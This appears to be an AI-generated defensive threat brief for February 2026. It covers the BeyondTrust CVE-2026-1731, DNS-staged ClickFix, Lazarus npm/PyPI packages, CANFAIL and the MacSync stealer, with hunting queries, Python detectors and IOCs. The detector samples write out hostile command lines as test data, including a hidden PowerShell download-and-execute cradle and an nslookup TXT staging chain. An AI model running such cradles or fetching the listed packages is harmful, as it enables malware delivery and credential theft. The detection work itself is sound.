Threat Brief - 2026-02-15

⚠️ This report is AI-generated. Always validate findings.

Threat Brief — Saturday, February 15, 2026

Executive Summary

BeyondTrust CVE-2026-1731 hit CISA KEV and was under active exploitation within 24 hours of the PoC release; hunt for portal enumeration and the WebSocket upgrades that follow it now. Microsoft disclosed a new ClickFix variant that stages its payload in DNS TXT records fetched with nslookup and delivers ModeloRAT. Lazarus continues to poison npm and PyPI under cover of fake blockchain job offers.


1. BeyondTrust RS/PRA Pre-Auth RCE

🔴 Critical · Remote Code Execution · CVE-2026-1731 (CVSS 9.9) · PoC Available

Pre-authentication OS command injection in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). Attackers first call get_portal_info to extract the x-ns-company value, then establish a WebSocket channel over which the command injection is triggered. watchTowr and GreyNoise confirmed in-the-wild exploitation less than 24 hours after the PoC was published.

Sources: The Hacker News · GreyNoise

TTPs

Technique | Tactic | Observable
T1190 | Initial Access | HTTP requests to /api/client/portal_info or similar BeyondTrust endpoints
T1059 | Execution | OS command injection via crafted HTTP requests
T1071.001 | C2 | WebSocket connections post-exploitation

IOCs

  • GreyNoise: 86% of observed reconnaissance came from a single IP using a commercial VPN (Frankfurt provider)
  • Mass-scanning operations rapidly added CVE-2026-1731 checks to their existing toolkits

Detection

Log Sources: Web server access logs, WAF, BeyondTrust application logs, network traffic

Logic:

# Hunt for portal enumeration: many portal_info/get_portal requests from one source
index=web sourcetype=access_* (uri_path="*portal_info*" OR uri_path="*get_portal*")
| stats count by src_ip, uri_path, status
| where count > 10

# WebSocket establishment post-portal query: an HTTP 101 Switching Protocols
# response to the same source within 60 s of its portal query. Counting SYNs on
# 443 fires on every new TLS connection; the upgrade response is the signal.
index=web sourcetype=access_* ((uri_path="*portal_info*" OR uri_path="*get_portal*") OR status=101)
| transaction src_ip maxspan=60s
| search status=101 (uri_path="*portal_info*" OR uri_path="*get_portal*")
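Added example, not code from the brief, GreyNoise or BeyondTrust: the two hunts above replayed in Python over constructed access-log lines, so the threshold and the 60 s window can be checked against known input before the SPL goes into production. The log layout, the request paths, the count threshold and the window are assumptions; the /ws path is a placeholder, not a BeyondTrust endpoint.

```python
# Added example (not from the brief, GreyNoise or BeyondTrust). Replays the two
# portal-enumeration hunts over constructed access-log lines.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log layout (constructed, not a real BeyondTrust log):
#   <src_ip> [<dd/Mon/yyyy:HH:MM:SS>] "<method> <path> HTTP/1.1" <status>
LINE_RE = re.compile(
    r'^(?P<src>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S"
PORTAL_RE = re.compile(r"portal_info|get_portal", re.I)


def _line(src, ts, path, status):
    return f'{src} [{ts.strftime(TS_FMT)}] "GET {path} HTTP/1.1" {status}'


def build_sample_log():
    """Constructed traffic: one enumerator, one benign client, one normal session.
    The /ws path is a placeholder for whatever endpoint the product upgrades on."""
    t0 = datetime(2026, 2, 15, 9, 0, 0)
    lines = []
    # 203.0.113.7: twelve portal_info probes with different company hints,
    # then a WebSocket upgrade (HTTP 101) 21 s after the last probe.
    for i in range(12):
        lines.append(_line("203.0.113.7", t0 + timedelta(seconds=i),
                           f"/api/client/portal_info?c=corp{i}", 200))
    lines.append(_line("203.0.113.7", t0 + timedelta(seconds=32), "/ws", 101))
    # 198.51.100.5: two lookups of its own portal, no upgrade.
    for m in (5, 6):
        lines.append(_line("198.51.100.5", t0 + timedelta(minutes=m),
                           "/api/client/portal_info?c=acme", 200))
    # 192.0.2.9: one lookup, upgrade five minutes later (outside the window).
    lines.append(_line("192.0.2.9", t0 + timedelta(minutes=10),
                       "/api/client/portal_info?c=acme", 200))
    lines.append(_line("192.0.2.9", t0 + timedelta(minutes=15), "/ws", 101))
    return lines


def parse(lines):
    events = []
    for ln in lines:
        m = LINE_RE.match(ln)
        if not m:
            continue  # line does not fit the assumed layout; skip, don't crash
        events.append({"src": m["src"], "ts": datetime.strptime(m["ts"], TS_FMT),
                       "path": m["path"], "status": int(m["status"])})
    return events


def portal_enumerators(events, threshold=10):
    """Hunt 1: sources with more than `threshold` portal_info/get_portal requests."""
    counts = defaultdict(int)
    for e in events:
        if PORTAL_RE.search(e["path"]):
            counts[e["src"]] += 1
    return {src: n for src, n in counts.items() if n > threshold}


def upgrade_after_portal(events, window=timedelta(seconds=60)):
    """Hunt 2: an HTTP 101 (WebSocket upgrade) from a source within `window` of
    that source's most recent portal query. Keyed on the 101 response rather
    than on SYNs, which would fire on every new TLS connection."""
    last_portal, hits = {}, []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if PORTAL_RE.search(e["path"]):
            last_portal[e["src"]] = e["ts"]
        elif e["status"] == 101 and e["src"] in last_portal:
            gap = e["ts"] - last_portal[e["src"]]
            if timedelta(0) <= gap <= window:
                hits.append((e["src"], gap.total_seconds()))
    return hits


if __name__ == "__main__":
    ev = parse(build_sample_log())
    print("enumerators:", portal_enumerators(ev))
    print("upgrade after portal:", upgrade_after_portal(ev))
```

Only the enumerator trips both hunts: the benign client never exceeds the threshold and the normal session upgrades well outside the window. Tune the threshold against how many portal lookups a legitimate client makes in your deployment before alerting on it.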

Existing Coverage:

  • None specific (gap) — generic web exploitation rules may trigger

Action

🔴 Patch immediately. If running BeyondTrust RS 21.3-25.3.1 or PRA 22.1-24.x, apply the BT26-02 patches now. Then hunt for portal enumeration attempts and the WebSocket upgrades that follow them; patching does not undo a compromise that happened before it.


2. DNS-Based ClickFix Attack (ModeloRAT/Lumma Stealer)

🔴 Critical · Social Engineering + Malware Delivery · No CVE · Active Campaigns

Microsoft disclosed a new ClickFix variant in which the pasted command runs nslookup against an attacker-chosen external DNS server and pulls the next stage out of TXT records. Nothing touches a web proxy, so the staging blends into ordinary DNS traffic and evades web-request monitoring. The chain delivers ModeloRAT (a Python RAT) and Lumma Stealer via CastleLoader.

Sources: The Hacker News · Microsoft

TTPs

Technique | Tactic | Observable
T1204.002 | Execution | User runs the pasted command via the Windows Run dialog
T1059.003 | Execution | cmd.exe launches nslookup with a hardcoded external DNS server (Windows Command Shell, not T1059.001)
T1059.001 | Execution | PowerShell runs the stage retrieved from DNS
T1071.004 | C2 | DNS queries to attacker-controlled nameservers
T1059.006 | Execution | Python-based ModeloRAT execution
T1547.001 | Persistence | LNK file in the Windows Startup folder

IOCs

  • azwsappdev[.]com — Payload hosting (ZIP archive)
  • Hardcoded external DNS servers (not system resolver)
  • VBScript launching ModeloRAT

Detection

Log Sources: Sysmon (ProcessCreate, NetworkConnect), DNS logs, PowerShell logs

Logic:

# nslookup given an explicit server (second positional argument) that is neither
# a private-range address nor an allowlisted public resolver
index=sysmon EventCode=1 Image="*nslookup.exe"
| rex field=CommandLine "nslookup(?:\s+-\S+)*\s+\S+\s+(?<dns_server>\S+)"
| where isnotnull(dns_server)
| where NOT match(dns_server, "^(10\.|172\.(1[6-9]|2\d|3[01])\.|192\.168\.|127\.)")
| where NOT match(dns_server, "^(8\.8\.8\.8|8\.8\.4\.4|1\.1\.1\.1|9\.9\.9\.9)$")
| table _time host User ParentImage CommandLine dns_server

# cmd.exe that spawns nslookup.exe and then powershell.exe within 30 s. The two
# are siblings, so group on ParentProcessId rather than matching parent/child.
index=sysmon EventCode=1 ParentImage="*cmd.exe" (Image="*nslookup.exe" OR Image="*powershell.exe")
| stats min(_time) as first max(_time) as last values(Image) as children by host, ParentProcessId
| where mvcount(children) > 1 AND (last - first) <= 30
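Added example, not Microsoft's code or the brief's: a Python pass over constructed Sysmon Event ID 1 records that pulls the server argument out of nslookup command lines, treats RFC 1918/loopback and allowlisted public resolvers as normal, and flags cmd.exe parents that spawn nslookup.exe followed by powershell.exe within 30 s. Field names mirror Sysmon's; the sample command lines, the TEST-NET addresses, the .invalid domain and the resolver allowlist are all constructed assumptions to tune per environment.

```python
# Added example (not Microsoft's or the brief's). Runs the two nslookup hunts
# over constructed Sysmon Event ID 1 records.
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Public resolvers admins do hand to nslookup while troubleshooting. Assumption;
# tune per environment.
RESOLVER_ALLOWLIST = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "1.0.0.1", "9.9.9.9"}
# RFC 1918 and loopback, checked explicitly: ipaddress.is_private also counts
# documentation ranges such as 203.0.113.0/24 as private, which would hide the
# constructed sample below.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def nslookup_server(cmdline):
    """Parse an nslookup command line into (query_type, server). nslookup treats
    '-opt' tokens as options, the first bare token as the name to resolve and
    the second bare token as the server to query."""
    qtype, positional = "A", []
    for tok in cmdline.split()[1:]:
        if tok.startswith("-"):
            key, _, val = tok[1:].partition("=")
            if key.lower() in ("type", "querytype", "q", "qt"):
                qtype = val.upper() or qtype
        else:
            positional.append(tok.strip('"'))
    return qtype, (positional[1] if len(positional) > 1 else None)


def is_external_server(server):
    """True when an explicit server is neither internal nor allowlisted. A bare
    hostname or an IPv6 address is surfaced for review rather than excused."""
    if server is None or server in RESOLVER_ALLOWLIST:
        return False
    try:
        ip = ipaddress.ip_address(server)
    except ValueError:
        return True
    if ip.version != 4:
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def flag_external_nslookup(records):
    hits = []
    for r in records:
        if r["Image"].lower().endswith("nslookup.exe"):
            qtype, server = nslookup_server(r["CommandLine"])
            if is_external_server(server):
                hits.append((r["ProcessId"], qtype, server))
    return hits


def cmd_nslookup_then_powershell(records, window=timedelta(seconds=30)):
    """(host, ParentProcessId) of cmd.exe parents whose children include
    nslookup.exe followed by powershell.exe within `window`. The two are
    siblings, so a parent/child match between them would never fire."""
    kids = defaultdict(list)
    for r in records:
        if r["ParentImage"].lower().endswith("cmd.exe"):
            kids[(r["Host"], r["ParentProcessId"])].append(r)
    hits = []
    for key, procs in kids.items():
        ns = [p["UtcTime"] for p in procs if p["Image"].lower().endswith("nslookup.exe")]
        ps = [p["UtcTime"] for p in procs if p["Image"].lower().endswith("powershell.exe")]
        if any(timedelta(0) <= p - n <= window for n in ns for p in ps):
            hits.append(key)
    return hits


def _rec(pid, ppid, t, image, parent, cmd):
    return {"Host": "ws01", "ProcessId": pid, "ParentProcessId": ppid, "UtcTime": t,
            "Image": image, "ParentImage": parent, "CommandLine": cmd}


def build_sample_records():
    """Constructed records (UtcTime pre-parsed to datetime); not real telemetry."""
    t0 = datetime(2026, 2, 15, 10, 0, 0)
    cmd, ns = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe"
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        # ClickFix chain: cmd from the Run dialog -> nslookup TXT against a
        # hardcoded external server -> powershell 2 s later
        _rec(100, 20, t0, cmd, r"C:\Windows\explorer.exe",
             'cmd.exe /c "nslookup -type=txt upd.stage.invalid 203.0.113.53 & powershell -nop -w hidden -c $x"'),
        _rec(101, 100, t0 + timedelta(seconds=1), ns, cmd,
             "nslookup -type=txt upd.stage.invalid 203.0.113.53"),
        _rec(102, 100, t0 + timedelta(seconds=3), ps, cmd, "powershell -nop -w hidden -c $x"),
        # Admin checking a record against the internal DNS server: benign
        _rec(201, 200, t0 + timedelta(minutes=5), ns, cmd, "nslookup corp-dc01 10.0.0.53"),
        # Troubleshooting against an allowlisted public resolver: benign
        _rec(301, 300, t0 + timedelta(minutes=7), ns, cmd, "nslookup example.com 8.8.8.8"),
    ]


if __name__ == "__main__":
    recs = build_sample_records()
    print("external nslookup:", flag_external_nslookup(recs))
    print("cmd -> nslookup -> powershell:", cmd_nslookup_then_powershell(recs))
```

The first hunt surfaces only the TXT query to 203.0.113.53; the internal and allowlisted lookups pass. The second hunt returns the cmd.exe that parented both children, which is the process whose command line carries the full pasted lure and is the one to pull for triage.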

Existing Coverage:

Action

🔴 Hunt for nslookup with external DNS. Microsoft detects as Trojan:Win32/ClickFix.R!ml. Look for LNK files in Startup folders pointing to VBScript.


3. Lazarus npm/PyPI Supply Chain Campaign

🔴 Critical · Supply Chain Compromise · No CVE · Active Since May 2025

The North Korea-linked Lazarus Group is seeding npm and PyPI with 25+ malicious packages, delivered through a fake blockchain recruitment lure (the fictitious company Veltrix Capital). Targets are approached with job offers on LinkedIn, Facebook and Reddit and handed "coding assessments" that pull the packages in. The packages deploy a token-authenticated RAT with file exfiltration capabilities.

Sources: The Hacker News · ReversingLabs

TTPs

Technique | Tactic | Observable
T1195.002 | Initial Access | Malicious npm/PyPI packages as dependencies
T1566.003 | Initial Access | Spearphishing via social platforms (LinkedIn, Reddit)
T1059.007 | Execution | JavaScript malware disguised as *.pdf.js
T1041 | Exfiltration | HTTP POST with token-based auth to C2

IOCs

Malicious npm packages: graphalgo, graphorithm, graphstruct, bigmathutils (10k+ downloads), terminal-kleur, graphflux, graphhub, graphrix

Malicious PyPI packages: graphalgo, graphex, graphlibx, bigpyx, bignum, bigmathutils

Indicators:

  • Fake company: Veltrix Capital
  • GitHub orgs with “blockchain” coding assessments
  • Token-based C2 authentication (Jade Sleet TTP)
  • MetaMask extension detection

Detection

Log Sources: Package manager logs, EDR, network traffic

Logic:

# npm/pip install of a listed package (full npm and PyPI lists from the IOCs above)
index=endpoint (process="*npm*" OR process="*pip*" OR process="*pip3*")
| regex CommandLine="(?i)\b(graphalgo|graphorithm|graphstruct|bigmathutils|terminal-kleur|graphflux|graphhub|graphrix|graphex|graphlibx|bigpyx|bignum)\b"

# JavaScript with double extension
index=sysmon EventCode=11 TargetFilename="*.pdf.js"

# MetaMask enumeration: Sysmon does not log file reads, so this needs EDR file
# access telemetry (field names vary by product; these are placeholders). Look
# for non-browser interpreters reading browser extension storage, where the
# MetaMask vault lives.
index=edr event_type=file_read (process="*node*" OR process="*python*")
  file_path="*\\Local Extension Settings\\*"
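Added example, not ReversingLabs' code or the brief's: a Python audit of a package-lock.json (lockfileVersion 2/3, which records nested installs that package.json never shows) and a requirements.txt against the package names listed above. Both manifests are constructed. npm audit and pip-audit only report packages with a published advisory, so for a fresh list like this one a direct name match is the quicker check.

```python
# Added example (not ReversingLabs' or the brief's). Checks a package-lock.json
# and a requirements.txt against the package names listed above.
import json
import re

MALICIOUS_NPM = {"graphalgo", "graphorithm", "graphstruct", "bigmathutils",
                 "terminal-kleur", "graphflux", "graphhub", "graphrix"}
MALICIOUS_PYPI = {"graphalgo", "graphex", "graphlibx", "bigpyx", "bignum", "bigmathutils"}

# Constructed manifests; not taken from any real project.
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"express": "^4.19.0", "graphflux": "^1.0.2"}},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/graphflux": {"version": "1.0.2",
                                   "dependencies": {"bigmathutils": "^0.3.1"}},
        # nested install: only the lockfile records it, package.json never does
        "node_modules/graphflux/node_modules/bigmathutils": {"version": "0.3.1"},
        "node_modules/chalk": {"version": "5.3.0"},
    },
})
SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt
requests==2.32.3
-r base.txt
GraphEx>=0.1        # case differs from the listed name
numpy==1.26.4
BigMathUtils[fast]==0.2.0
"""


def npm_lock_hits(lock_text):
    """Every installed path in a lockfileVersion 2/3 lock, nested trees included.
    Returns sorted (name, version, path)."""
    lock = json.loads(lock_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        name = path.rsplit("node_modules/", 1)[-1]  # last segment, handles nesting
        if name in MALICIOUS_NPM:
            hits.append((name, meta.get("version", "?"), path))
    return sorted(hits)


def normalize_pypi(name):
    """PEP 503 name normalization, so GraphEx and graphex compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


REQ_NAME = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")


def requirements_hits(text):
    """Returns (normalized_name, original_line) for each listed package."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("-"):
            continue                              # blank, -r/-e/--index-url lines
        m = REQ_NAME.match(line)
        if m and normalize_pypi(m.group(1)) in MALICIOUS_PYPI:
            hits.append((normalize_pypi(m.group(1)), line))
    return hits


def audit(lock_text, requirements_text):
    return {"npm": npm_lock_hits(lock_text), "pypi": requirements_hits(requirements_text)}


if __name__ == "__main__":
    for eco, found in audit(SAMPLE_PACKAGE_LOCK, SAMPLE_REQUIREMENTS).items():
        for hit in found:
            print(eco, *hit)
```

The nested bigmathutils is the case that matters: it is pulled in by graphflux and would be missed by anyone grepping package.json. Point requirements_hits at the output of pip freeze as well, since requirements.txt rarely lists transitive installs.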

Existing Coverage:

Action

🔴 Audit dependencies against the package list above, lockfiles included so transitive installs are covered. npm audit and pip-audit only report packages with published advisories, so do not rely on them alone. Block or alert on the listed names. Educate developers on fake recruiter campaigns that hand out "coding assessments".


4. CANFAIL Malware Targeting Ukraine

🟡 High · Espionage · No CVE · Russian-Linked APT

Google's Threat Intelligence Group (GTIG) attributes the CANFAIL malware to a suspected Russian intelligence actor targeting Ukrainian defense, energy and government organizations. The actor uses LLMs for reconnaissance and lure generation; phishing emails impersonate Ukrainian energy companies.

Sources: The Hacker News · Google Cloud Blog

TTPs

Technique | Tactic | Observable
T1566.002 | Initial Access | Google Drive links in phishing emails
T1059.007 | Execution | Obfuscated JavaScript (.pdf.js)
T1059.001 | Execution | PowerShell dropper → memory-only execution
T1204.002 | Execution | User opens the RAR archive content (Malicious File; T1204.001 is Malicious Link and covers the Drive link itself)
T1071.001 | C2 | WebSocket-based trojan communication (Web Protocols; T1102 would apply only if a legitimate web service were used as the relay)

IOCs

  • RAR archives via Google Drive links
  • JavaScript files with double extension (*.pdf.js)
  • Fake Ukrainian energy company domains
  • LLM-generated phishing lures

Detection

Log Sources: Email gateway, Sysmon, PowerShell logs

Logic:

# Archive tool spawning a script host (user opened the .js straight from the
# archive viewer), or any script host running a double-extension .pdf.js.
# Grouping on ParentProcessId would miss this: wscript is the archiver's child,
# or explorer's if the user extracted first.
index=sysmon EventCode=1 (Image="*wscript.exe" OR Image="*cscript.exe")
  ((ParentImage="*WinRAR*" OR ParentImage="*7z*") OR CommandLine="*.pdf.js*")

# Memory-only PowerShell: no -File, but an encoded command or an inline loader.
# -e alone would also match -ExecutionPolicy, so anchor the flag on whitespace.
index=sysmon EventCode=1 Image="*powershell.exe"
| where NOT match(CommandLine, "(?i)\s-f(ile)?\s")
| where match(CommandLine, "(?i)\s-e(c|n[a-z]*)?\s|FromBase64String|\bIEX\b|Invoke-Expression|DownloadString")
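Added example, not GTIG's code or the brief's: the memory-only PowerShell hunt above in Python over constructed command lines. It recognises the abbreviations powershell.exe accepts for -EncodedCommand (-e, -ec, -en, -enc and so on) without tripping on -ExecutionPolicy, decodes the UTF-16LE payload so the loader strings inside it can be matched, and drops anything that runs a script through -File. The indicator list and the sample command lines are assumptions.

```python
# Added example (not GTIG's or the brief's). The memory-only PowerShell hunt,
# run over constructed command lines.
import base64
import re

# Loader strings worth matching once the command text is visible. Assumed list.
INDICATORS = {
    "FromBase64String": re.compile(r"FromBase64String", re.I),
    "Invoke-Expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "Download": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "Reflective-load": re.compile(r"Reflection\.Assembly\]::Load|::Load\(", re.I),
}


def _flag(tok):
    """Lowercase text of a '-Flag' or '/Flag' token, '' for anything else."""
    return tok[1:].lower() if tok[:1] in "-/" and len(tok) > 1 else ""


def is_encoded_flag(tok):
    """powershell.exe accepts -e, -ec and any prefix of -EncodedCommand of two
    or more letters (-en, -enc, -enco ...). -ExecutionPolicy does not qualify."""
    f = _flag(tok)
    return f in ("e", "ec") or (len(f) >= 2 and "encodedcommand".startswith(f))


def is_file_flag(tok):
    f = _flag(tok)
    return bool(f) and "file".startswith(f)   # -f, -fi, -fil, -file


def decode_encoded_command(cmdline):
    """Decoded script if the line carries an encoded command, else None.
    The blob is base64 over UTF-16LE, not UTF-8."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if is_encoded_flag(tok):
            try:
                blob = toks[i + 1].strip("'\"")
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(cmdline):
    """Returns (memory_only, decoded_script, indicators). A line with -File is
    dropped outright; otherwise an encoded command or any loader indicator in
    the (decoded) text counts."""
    toks = cmdline.split()
    if any(is_file_flag(t) for t in toks):
        return False, None, []
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    found = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return (decoded is not None or bool(found)), decoded, found


def build_samples():
    """Constructed command lines; the encoded one is built here from a short
    loader so the decode path is exercised against a known plaintext."""
    loader = "$b=[Convert]::FromBase64String('aGk=');IEX([Text.Encoding]::UTF8.GetString($b))"
    enc = base64.b64encode(loader.encode("utf-16-le")).decode()
    return {
        "encoded": f"powershell.exe -nop -w hidden -enc {enc}",
        "inline": "powershell.exe -ExecutionPolicy Bypass -c "
                  "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')\"",
        "script_file": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
        "benign": "powershell.exe -NoProfile -Command Get-Service",
    }


if __name__ == "__main__":
    for label, cmd in build_samples().items():
        memory_only, decoded, found = analyze(cmd)
        print(f"{label:12} memory_only={memory_only} indicators={found}")
        if decoded:
            print("  decoded:", decoded)
```

Decoding before matching is the point: the encoded sample contains FromBase64String and IEX, but neither string appears in the raw command line that Sysmon records, so a regex over CommandLine alone only catches it through the -enc flag and never sees what the stage does.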

Existing Coverage:

Action

🟡 Hunt if in-scope. Relevant for orgs supporting Ukraine or in defense/energy sectors. Look for Google Drive links in phishing leading to RAR→JS→PowerShell chains.


5. macOS MacSync Stealer via Claude/Google Ads

🟡 High · Info Stealer · No CVE · ClickFix Social Engineering

The campaign abuses Google Ads and Anthropic Claude artifacts to deliver the MacSync stealer; Moonlock Lab estimates 15,000+ users exposed. It uses the ClickFix technique to trick users into pasting a command into Terminal, then targets the keychain, browser data and crypto wallets.

Sources: CyberPress · Moonlock Lab

TTPs

Technique | Tactic | Observable
T1583.008 | Resource Dev | Malvertising via Google Ads
T1204.002 | Execution | User pastes Base64 command into Terminal
T1059.002 | Execution | osascript piped command execution
T1555 | Cred Access | Keychain credential theft
T1041 | Exfiltration | HTTP POST with chunked uploads

IOCs

  • a2abotnet[.]com/dynamic — C2 server
  • a2abotnet[.]com/gate — Data exfil endpoint
  • raxelpak[.]com — Payload hosting
  • apple-mac-disk-space.medium[.]com — Fake Apple article
  • /tmp/osalogging.zip — Staging file

Detection

Log Sources: macOS Unified Logs, EDR, network traffic

Logic:

// curl piped to osascript: the two are siblings under the same shell, not
// parent/child, so correlate on the shared parent instead of process.parent.name
sequence by host.id, process.parent.entity_id with maxspan=10s
  [process where event.type == "start" and process.name == "curl"]
  [process where event.type == "start" and process.name == "osascript"]

// Base64 decode in an interactive Terminal session (macOS base64 takes -D;
// newer builds also accept -d/--decode)
process where event.type == "start" and process.name == "base64"
  and process.args in ("-d", "-D", "--decode")
  and process.parent.name in ("bash", "zsh", "sh")

// Network to known C2
any where dns.question.name in ("a2abotnet.com", "raxelpak.com")

Existing Coverage:

Action

🟡 Block IOCs at the perimeter: add a2abotnet[.]com and raxelpak[.]com to DNS and web blocklists. Educate users about fake "DNS resolver" or "disk analyzer" prompts that ask them to paste a command into Terminal; no legitimate fix requires that.


6. CISA KEV Additions (Feb 12-14)

🟡 High · Multiple Products · Active Exploitation

CISA added 4 vulnerabilities to the KEV catalog. Notable: the Notepad++ entry, a supply chain attack attributed to China-linked Lotus Blossom that delivered the Chrysalis backdoor.

CVE | Product | CVSS | Notes
CVE-2026-20700 | Apple iOS/macOS | 7.8 | Memory corruption, targeted spyware delivery
CVE-2025-15556 | Notepad++ | 7.7 | Update hijack → Chrysalis backdoor (Lotus Blossom)
CVE-2025-40536 | SolarWinds WHD | 8.1 | Auth bypass, used in lateral movement campaigns
CVE-2024-43468 | Microsoft SCCM | 9.8 | SQL injection (patched Oct 2024, now actively exploited)

Sources: CISA KEV · SC Media

Detection

Log Sources: Endpoint telemetry, software inventory, web logs

Existing Coverage:

Action

🟡 Verify patch status. Federal agencies must remediate by March 5, 2026. Hunt for SolarWinds WHD exploitation if it is internet-exposed. Confirm that Notepad++ installs updated through the official channel and hunt for Chrysalis indicators.


Priority Actions

  1. 🔴 BeyondTrust CVE-2026-1731 — Patch RS/PRA immediately; hunt for get_portal_info probes
  2. 🔴 ClickFix DNS staging — Hunt for nslookup to external DNS servers followed by PowerShell
  3. 🔴 Lazarus npm/PyPI — Audit for malicious packages: graphalgo, bigmathutils, graphflux family
  4. 🟡 macOS MacSync — Block a2abotnet[.]com and raxelpak[.]com; educate users on Terminal paste attacks
  5. 🟡 CISA KEV — Verify SCCM, SolarWinds WHD, Notepad++ patch status; hunt for Chrysalis indicators